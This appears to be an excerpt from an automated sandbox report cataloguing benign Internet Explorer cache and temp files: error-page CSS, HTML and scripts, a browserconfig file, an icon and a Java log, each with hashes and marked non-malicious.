SHA-512:	FB3DE82F4D39726FD0F52008923CE55CBC5A734D4223C0A03E1499FA74981D16243EAC6E735A3FA98E0B80971E0BF43A4C089436840CCC4115D4492C70A47843
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a394ee,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x33a394ee,0x01d6e846</date><accdate>0x33a5f732,0x01d6e846</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
IE Cache URL:	res://ieframe.dll/NewErrorPageTemplate.css
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\dnserror[2] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=9003
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
IE Cache URL:	res://ieframe.dll/down.png
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9026IKNJ\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\down[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 15 x 15, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	748
Entropy (8bit):	7.249606135668305
Encrypted:	false
SSDEEP:	12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
MD5:	C4F558C4C8B56858F15C09037CD6625A
SHA1:	EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
SHA-256:	39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
SHA-512:	D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
Malicious:	false
Preview:	.PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?\|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CS6IXJW6\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1612
Entropy (8bit):	4.869554560514657
Encrypted:	false
SSDEEP:	24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
MD5:	DFEABDE84792228093A5A270352395B6
SHA1:	E41258C9576721025926326F76063C2305586F76
SHA-256:	77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
SHA-512:	E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
Malicious:	false
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0005&DNSError=0
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	4720
Entropy (8bit):	5.164796203267696
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
MD5:	D65EC06F21C379C87040B83CC1ABAC6B
SHA1:	208D0A0BB775661758394BE7E4AFB18357E46C8B
SHA-256:	A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
SHA-512:	8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
Malicious:	false
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	12105
Entropy (8bit):	5.451485481468043
Encrypted:	false
SSDEEP:	192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
MD5:	9234071287E637F85D721463C488704C
SHA1:	CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
SHA-256:	65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
SHA-512:	87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem

C:\Users\user\AppData\Local\Temp\JavaDeployReg.log Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	89
Entropy (8bit):	4.330858678274478
Encrypted:	false
SSDEEP:	3:oVXUBcNwspNW8JOGXnEBcNwsUULun:o9UBm4qEB3
MD5:	9B2F941CC234206ED52127B15C3DB5C4
SHA1:	CFA1858AE4D0BAD526EA88C088894AE87E7B68BC
SHA-256:	E62B2E85EE25A7F9675E2672D59BAE17BCF10A6E913BF5358AA4305B616F4772
SHA-512:	729D1A577343DB9EE0487DCF350241F878F815B11C91EC2FA2BB78897FE1A2B936DD35D5660BAB55511FF70D29C20E191E85793B66D88F2FEB82317B52B6BE7F
Malicious:	false
Preview:	[2021/01/11 19:19:58.275] Latest deploy version: ..[2021/01/11 19:19:58.275] 11.211.2 ..

C:\Users\user\AppData\Local\Temp\~DF2067CF7CEB139563.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39633
Entropy (8bit):	0.571125479592397
Encrypted:	false
SSDEEP:	48:kBqoxKAuvScS+/hDqOIO+gSexjm/r310kcgSexjm/r310kcgSexjm/r310k9:kBqoxKAuvScS+/hDqxby6Rmy6RWy6Rv
MD5:	1E9C165BA8BBA336C2F29A759A8A63F4
SHA1:	196030A43DA96C58881459B13C0EC493E61714E0
SHA-256:	C30B5984EF56B3CBCF4CAC78DF3D6BFF6A773ACB643894B06B8D8931651283A9
SHA-512:	367F0BD24041967CA819E403BC99143DA2587B359743473F94533B35FF571115E89D430637E078E7FC875F03EB0AC0E2B6831B6B925168F645DF4DFE3964B87A
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3AD4F610F2F01C17.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4073703340301186
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9loLuS9loLuC9lWLuu4ciu43A3:kBqoILmL4LmW
MD5:	9E06FBC5BBCCF4AD5560712694B4D83F
SHA1:	17EBB760CB64206E78E840D1D07EA9E218DB3810
SHA-256:	F56041664FC19EB49766B6932193151BA2E3CC4BE20C25915F1D6B4B1660FB86
SHA-512:	9D06774BFCAD97F9BB46B67B4D061CF547E7956EC70EE7C8D82F1617C3E81555F0EA25AE7CEF847E27C2D3BCEA19DEE912ACFBE85C85AD0DEDF0B6DEFD90347F
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF3BDE2C19B223BD97.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	0.4082977278331884
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9logUS9logUC9lWgUWUzgUbUhUzgUVUXU3:kBqoIg4gmgRkgA2kgCUw
MD5:	23F6F6B07B5E7E986466E1CD2C4B5FB4
SHA1:	17E7B294F38E630D17E00A334F7B5D722A082752
SHA-256:	2376D6EBB665AB2483161DF184CD9E4B5C409030BBA45D244DAA9401CDA61352
SHA-512:	11175CB1340AD507F58D108BE07F56B3DE7A3E39EB5F518B9B8C0A5E2CF21BDF72B47DCB6E1AE0BAEEDF96A369CDA555097203F954084586857537D5B122CFD8
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF4EBD4894B35EDD90.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39633
Entropy (8bit):	0.567384082930945
Encrypted:	false
SSDEEP:	96:kBqoxKAuvScS+j9PGN3334OC334Oi334Or:kBqoxKAuqR+j9PGN3n4OCn4Oin4Or
MD5:	4862725EC73842A1146F44DA0C1DCB2D
